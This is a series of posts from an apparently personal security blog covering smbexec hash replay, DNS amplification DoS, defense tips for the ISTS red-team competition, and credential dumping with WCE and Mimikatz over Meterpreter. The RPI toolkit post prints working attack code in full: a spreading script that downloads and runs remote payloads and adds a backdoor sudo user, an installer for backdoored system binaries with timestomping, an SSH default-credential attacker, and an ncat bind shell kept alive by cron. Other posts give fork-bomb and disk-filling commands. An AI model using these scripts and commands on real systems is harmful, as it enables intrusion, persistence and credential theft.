Defensive ideas from offensive guys – Derbycon 2013

Derbycon 2013

Posted in InfoSec

smbexec fun

Just another blog post about the basics and tools I find useful.  If you’re a pentester and you’re not using SMBexec you might be wasting some time and missing out on a well written and very helpful tool.

smbexec is available here it was written by Eric Milam (Brav0Hax) & Martin Bos (purehate_)

A few of the key features

  • Enumerate systems with domain admin logged in
  • Grab hashes
  • Dump cleartext credentials 
  • Pop shells

All done over SMB

Menu Layout

SMBexec1

Main Menu

Enum

Enumeration Menu

exploit

Exploitation Menu

Hashes

Obtain Hashes Menu

Simple example the assumption is you already compromised a host, obtained an administrator hash and you plan to replay the hash against other hosts.

Identify Hosts

Identify hosts with SMB listening

Identify hosts with SMB listening

Enumerate Shares

Enumerating Shares

Enumerating Shares

Launching a Meterpeter session over SMB

Configuring Payload

Configuring Payload

Meterpeter Payload being built

Meterpeter Payload being built

Metasploit handler being launched

Metasploit handler being launched

SMBExec Uploading and Executing

SMBExec Uploading and Executing

Sessions :-)

Sessions :-)

That should cover some basic usage for extensive video tutorials check out - http://www.youtube.com/user/Brav0Hax/videos?view=0

Tagged with: , , ,
Posted in InfoSec

DNS Amplification DoS Basics

Amplification based DoS attacks are not a new concept they were abused heavily in the 90s with ip directed broadcast attacks also known as smurf attacks.

DNS amplification attacks rely on the fact UDP DNS requests are small and can be easily spoofed with the returned data being much larger then the original request ending up hitting the victims network.

Below is a sample DIG request for Amazon.com

Amazon

dig request amazon.com

Lets look at the packet size in wireshark

AmazonQUery81bytes

DNS request 81 bytes

And the response

Amazon879Bytes

If you look at the request and response the request was 81 bytes and the response was 879 bytes with some quick research it wouldn’t be hard to find other domains with a better rate of return however this is still a significant return on a small request.

Spoofing a DNS ALL request for ebay.com from 173.255.232.242 and capturing it in tshark.

DNSspoof

This covers the basic theory of the attack.

Attackers spoof DNS requests from the victims IP -> DNS servers respond with huge responses filling the connection of the victim.

In the wild DNS servers are often compromised and extremely large TXT records are configured resulting in replies up to 4000 bytes enhancing amplification.

Combine this entire attack with a botnet and it’s very easy to generate Gbps with relatively low traffic being sent from botnet nodes.

For more details on these attacks in the wild check out the defcon 14 talk by Randal Vaughn - http://www.youtube.com/watch?v=-mBzpMeiqec

Prevention

There are a number of methods to prevent your DNS servers from being abused in this way the easiest is filtering recursive requests and rate limiting DNS traffic.

You can check for known open resolvers on your network here - http://openresolverproject.org/

Tagged with: , , , ,
Posted in InfoSec

ISTS – Defense

578244_10151316002980060_639846740_n

ISTS X

More info on the ISTS event here http://ists.sparsa.org

Some tips/tricks from a Red team members point of view on improving defense.

You need to start this event keeping two important concepts in mind.

1.  You will get hacked.

2.  Your systems have multiple vulnerabilities by design.

Default Credentials

All passwords on all systems will be in some weak or default configuration changing these immediately will help stop automated attacks.

Common System Misconfigurations

It’s common for a lot of teams to not have an understanding of the current services running on their Linux machines issuing a quick “netstat -anp | grep LISTEN” as root will show open ports and related process/program name.

netstat

VNC with no password
q8KPSbc (1)

Red team viewing blue team machine over VNC

VNC can be configured with no password and give complete console access to the machine.  In addition to no password there have also been authentication bypass expliots and often times its configured with a weak password.

Web Based Management Tools

Webmin(Port 10000) and PHPMyAdmin are often used to remotely administer Linux machines they can be configured with various authentication mechanisms this is another great place to look for default credentials.

Sudoers file

During the competition and even at the beginning be mindful of /etc/sudoers this file controls who has access to sudo and the ability to run commands as root.

FTP Configuration Issues

FTP is often configured with anonymous FTP enabled, Versions that have known exploits, or allowing access to sensitive files.

During this years competition it was configured to serve up / and combined with the weak permissions it made accessing /etc/shadow and other sensitive files trivial.

MySQL root no password

MySQL configured with a root account and no password is a common configuration mistake but can lead to all kinds of fun things.

2ZtqRax

Incorrect permissions

Permissions on /etc/shadow allowed any user to view this file and allowed access to all the hashes.

These were dumped by a PHP backdoor with the user account www-data

bNEhfbq

Insecure Web Applications

There were a number of web vulnerabilities including local file inclusion and multiple backdoors such  as the c99 shell in shell.php.

This is an area that might take some work using grep and other tools to look for insecure functions and obvious backdoors in web applications.

c99

get

seashell1

Scoring Engine Checks

The scoring engine checks the availability of many services by logging in with SSH/FTP.  Depending on the configuration of these accounts they usually had access to ssh and interactive login.

Even with normal user privileges there was still attack surface for denial of service attacks including filling up the hard drive with random files or launching a fork bomb.

perl -e “fork while fork” &

:(){ :|:& };:

cat /dev/urandom > randomfile &

These attacks can be mitigated by using the ulimit command and making changes to /etc/security/limits.conf

Windows Security

Patching

This shouldn’t need mentioning but if you’re doing a CTF style even and you see an XP/2003 box there is a very good chance its vulnerable to MS08-067 or if you come across Vista SP1/SP2 or server 2008 might want to look for MS09-050

these exploits get popped quickly and you will be fighting a battle to remove any level of persistance by the red team or other teams.

Firewall

Enabling the windows firewall to block 139/445 and other services that don’t need remote access will be critical.

Passwords

Once compromised its trivial to dump cleartext windows passwords out of memory keep this in mind if you’re reusing the same admin password or password style across multiple machines.

It’s also extremely easy to dump the password hashes even if you used a complex password teams can regain access by launching psexec over 445 and using the password hash to login.

What now?

A few tips to get you started

Familiarize your self with the various locations commands get launched from on boot.  An example of this would be HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Be mindful of all temp directories and odd looking files.

Learn how to use the sysinternals tools to detect backdoors.  There are a number of great articles on detecting malware process explorer, tcpview, and other sysinternals tools.

Log files are your friend unless someone deletes them :-)

If you detect compromise remember to rotate your windows passwords quickly.

The last point is make sure you’re having fun

More details from another ISTS Redteam member can be found here - http://www.antitree.com/ists-x/

ISTS Redteam Reddit - http://www.reddit.com/r/istsredteam

Tagged with: , , , ,
Posted in InfoSec

RPI Toolkit – ISTS X

It’s my second year red teaming the ISTS event at RIT.  ISTS is a event similar to CCDC where teams protect a network from the red team while doing business injects.  The twist with ISTS is teams can play offense against each other.

Every year RPI does an amazing job with custom scripts and backdoors.

RPI 2012

Twitter1.py

import threading, subprocess, re, socket, time, sys

def list_ip():
 yield '127.0.0.1'
 first = int(sys.argv[1])
 second = int(sys.argv[2])
 for item in range(1,14):
 if item in [first, second]:
 continue
 for sub in [10, 20, 30]:
 yield '10.0.%s.%s' % (item, sub)

 for item in range(1,14):
 if item in [first, second]:
 continue
 try:
 yield socket.gethostbyname('priceofwales.team%s.ists' % item)
 except:
 pass
 try:
 yield socket.gethostbyname('missouri.team%s.ists' % item)
 except:
 pass
def get_ports():
 output = subprocess.check_output("netstat -l -t -n", shell=True)
 output = [x for x in output.split("\n") if 'unix' not in x]
 output = "\n".join(output)
 print output
 ports = [m.group(1) for m in re.finditer(':([0-9]+)', output)]
 print ports
 ports = map(int, ports)
 print ports
 for port in ports:
 if port >= 1024:
 yield port

def spawn_thread(ip, port):
 a = threading.Thread(target = attack_thread, args=(ip, port))
 a.start()

def attack_thread(ip, port):

 attack = """
mkdir /var/tmp
wget http://xxxxxxxx.cs.rpi.edu/~xxxxxxx/unlisted/debian-installer.sh -O /var/tmp/installer.sh
bash /var/tmp/installer.sh
rm /var/tmp/installer.sh
useradd -g 0 -G 0,1,2,3,4,6,10 -M util -p `mkpasswd rpisec412180`
useradd -g 0 -G 0,1,2,3,4,6,10 -M util
passwd --stdin rpisec412180
echo "util ALL=(ALL) ALL" >> /etc/sudoers
apt-get install openssh-server -y

wget http://dl.dropbox.com/u/xxxxxx/twitter_r.py -O /var/tmp/twitter_r.py
wget http://dl.dropbox.com/u/xxxxxx/get_access_token.py -O /var/tmp/get_access_token.py
wget http://dl.dropbox.com/u/xxxxxx/twitter.py -O /var/tmp/twitter.py

python /var/tmp/twitter_r.py &
sleep 1
rm /var/tmp/twitter_r.py
rm /var/tmp/twitter.py
rm /var/tmp/get_access_token.py

"""

 print ip, port
 sock = socket.create_connection((ip, port))
 sock.send(attack)
 while True:
 time.sleep(0)

def attack():
 for port in get_ports():
 for ip in list_ip():
 spawn_thread(ip, port)
if __name__ == "__main__":
 attack()

debiant-installer.sh

#!/bin/sh
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/linux-agent -O /tmp/linux-agent -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/ls -O /tmp/ls -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/lsdebian/bin/ps -O /tmp/ps -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/rm -O /tmp/rm -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/unlink -O /tmp/unlink -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/top -O /tmp/top -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/lib/libproc-3.2.8.so -O /tmp/libproc-3.2.8.so -q
chmod 755 /tmp/ls
chmod 755 /tmp/ps
chmod 755 /tmp/rm
chmod 755 /tmp/unlink
chmod 755 /tmp/top
mv /tmp/ls /bin
mv /tmp/ps /bin
mv /tmp/rm /bin
mv /tmp/top /usr/bin
mv /tmp/unlink /usr/bin
mv /tmp/libproc-3.2.8.so /lib
touch -d "2008-04-04 10:22" /bin/ls
touch -d "2009-01-11 16:49" /bin/ps
touch -d "2008-04-04 10:22" /bin/rm
touch -d "2008-04-04 10:22" /usr/bin/unlink
touch -d "2009-01-11 16:49" /lib/libproc-3.2.8.so
touch -d "2009-01-11 16:49" /usr/bin/top
chmod 755 /tmp/linux-agent
mv /tmp/linux-agent "/sbin/dhclient3_1337_"
touch -d "2008-08-12 10:09" /sbin/dhclient3_1337_
/sbin/dhclient3_1337_
echo -e "\tpost-up /sbin/dhclient3_1337_" >> /etc/network/interfaces

2013 RPI stepped it up again.

After exploiting one of RPIs machines I was searching for useful data and pulled down a tarball containing

tar

Then downloaded all referenced files

Untitled

Quick over view of files

a.out 64.out 32.out are compiled versions of main.c

aptpayload.txt and s.sh are dropped when main.c exploits a host with default credentials

inet, Packages, sources.list are all part of the aptpayload

The rest of the files are rc scripts for metasploit including ssh scanners and post exploitation with metasploit persistance.

Here we go

main.c

#include <libssh/libssh.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

int kill(char * host, char * username);

int main()
{
 char host[256];
 int i;
 for (i = 1; i <= 7; i++) {
 sprintf(host, "10.0.%d.100", i);
 kill(host, "root");
 kill(host, "administrator");
 sprintf(host, "10.0.%d.101", i);
 kill(host, "root");
 kill(host, "administrator");
 }
 for (i = 8; i <= 12; i++) {
 sprintf(host, "10.0.%d.100", i);
 kill(host, "root");
 kill(host, "administrator");
 sprintf(host, "10.0.%d.101", i);
 kill(host, "root");
 kill(host, "administrator");
 }
 return 1;
}

int kill(char * host, char * username) {
 pid_t pid = fork();
 if (pid != 0) {
 return 1;
 }
 unsigned int nbytes;

ssh_session my_ssh_session = ssh_new();
 if (my_ssh_session == NULL) {
 printf("Error initializing ssh conn\n");
 exit(-1);
 }

ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "192.168.0.149");

int rc = ssh_connect(my_ssh_session);
 if (rc != SSH_OK)
 {
 fprintf(stderr, "Error connecting to localhost: %s\n",
 ssh_get_error(my_ssh_session));
 exit(-1);
 }

rc = ssh_userauth_password(my_ssh_session, "root", "changeme");
 if (rc != SSH_AUTH_SUCCESS) {
 fprintf(stderr, "Error authenticating with password: %s\n",
 ssh_get_error(my_ssh_session));
 exit(-1);
 }

ssh_channel channel = ssh_channel_new(my_ssh_session);
 if (channel == NULL) {
 fprintf(stderr, "Error channel new creation: %s\n",
 ssh_get_error(my_ssh_session));
 exit(-1);
 }
 rc = ssh_channel_open_session(channel);
 if (rc != SSH_OK)
 {
 ssh_channel_free(channel);
 exit(-1);
 }
 rc = ssh_channel_request_exec(channel,
"wget http://xxxxxx.cs.rpi.edu/~xxxxxxxxxx/ists/aptpayload.txt
&& chmod +x aptpayload.txt && ./aptpayload.txt; rm aptpayload.txt;
wget xxx.xxx.xxx.xxx/ists/s.sh && chmod +x s.sh && ./s.sh; rm ./s.sh");
 if (rc != SSH_OK)
 {
 ssh_channel_close(channel);
 ssh_channel_free(channel);
 exit(-1);
 }
 char buffer[256];
 nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
 while (nbytes > 0)
 {
 if (write(1, buffer, nbytes) != nbytes)
 {
 ssh_channel_close(channel);
 ssh_channel_free(channel);
 exit(-1);
 }
 nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
 }
 if (nbytes < 0)
 {
 ssh_channel_close(channel);
 ssh_channel_free(channel);
 exit(-1);
 }

ssh_channel_send_eof(channel);
 ssh_channel_close(channel);
 ssh_channel_free(channel);

ssh_disconnect(my_ssh_session);
 ssh_free(my_ssh_session);
 exit(0);
}

aptpayload.txt

#!/bin/bash
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 1A44B9C399E17A16
wget http://debianmirror.org/sources.list -O /etc/apt/sources.list
apt-get update
apt-get install -y inetutils-ping

s.sh


#!/bin/bash

chattr -i /tmp/session.sh
echo "ncat -l 57298 -e /bin/bash -k" > /bin/session.sh
chmod +x /bin/session.sh
chattr +i /bin/session.sh
/bin/session.sh &
chattr -i /etc/crontab
echo "" >> /etc/crontab
echo "" >> /etc/crontab
echo "* * * * * root /bin/session.sh > /dev/null 2>&1" >> /etc/crontab
chattr +i /etc/crontab

Quick strings on the replaced ping command

pingbin

A few thoughts for RPI and other teams

Be prepared to handle multiple operating systems ISTS often changes operating systems last minute or without notice.

Work harder on protecting scripts/back doors and include obfuscation techniques.

A few of the MSF scripts had commands out of order and would have made it impossible for them to work properly.

Looking forward to what they bring out next year :-)

Tagged with: , , , , ,
Posted in InfoSec

WCE and Mimikatz in memory over meterpreter

While hashes are great and passing the hash is an effective attack method it never hurts to have plain text passwords. Companies tend to reuse passwords on various systems or use the same password style across their network.

Currently the two primary tools for doing this are WCE and Mimikatz both methods will be shown over an existing meterpeter session.

First up WCE the old way dropping a binary

Upload

Uploading wce.exe over a meterpreter session

Dropping to shell and executing WCE

Dropping to shell and executing wce

As you can see this involves dropping a binary to the target machine.

This process was  automated with a post exploitation script which uploads and executes wce.  It can be found http://pastebin.com/kQ41wLM7 and was written by @jabjorkhaug

Time to take a look at the execute command

Untitled

-m looks like a fun option

Running in memory will give you a better chance of anti virus avoidance.

Lets try WCE again without dropping the binary

inmem

Launching WCE in memory from meterpreter

execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w

Next up Mimikatz

mimikatz

Launching Mimikatz in memory from meterpreter

execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a  ‘”sekurlsa::logonPasswords full” exit’

While both of these are executed in memory WCE writes a DLL to disk when its running.  Mubix has a detailed blog post on Mimikatz in memory this gives Mimikatz  a great advantage over WCE since it never touches disk.

More information on in memory execuction can be found here - Eternal Sunshine of the Spotless RAM

Mimikatzhttp://blog.gentilkiwi.com/mimikatz

Mimikatz english versionhttps://github.com/thomhastings/mimikatz-en

Windows Credential Editor(WCE)http://www.ampliasecurity.com/research.html

Metasploithttp://www.metasploit.com/download/

Tagged with: ,
Posted in InfoSec

Lets try this again…

Firing up the blog again.

 

Trying to use this as a way to document things I find interesting.

Posted in Uncategorized
Follow

Get every new post delivered to your Inbox.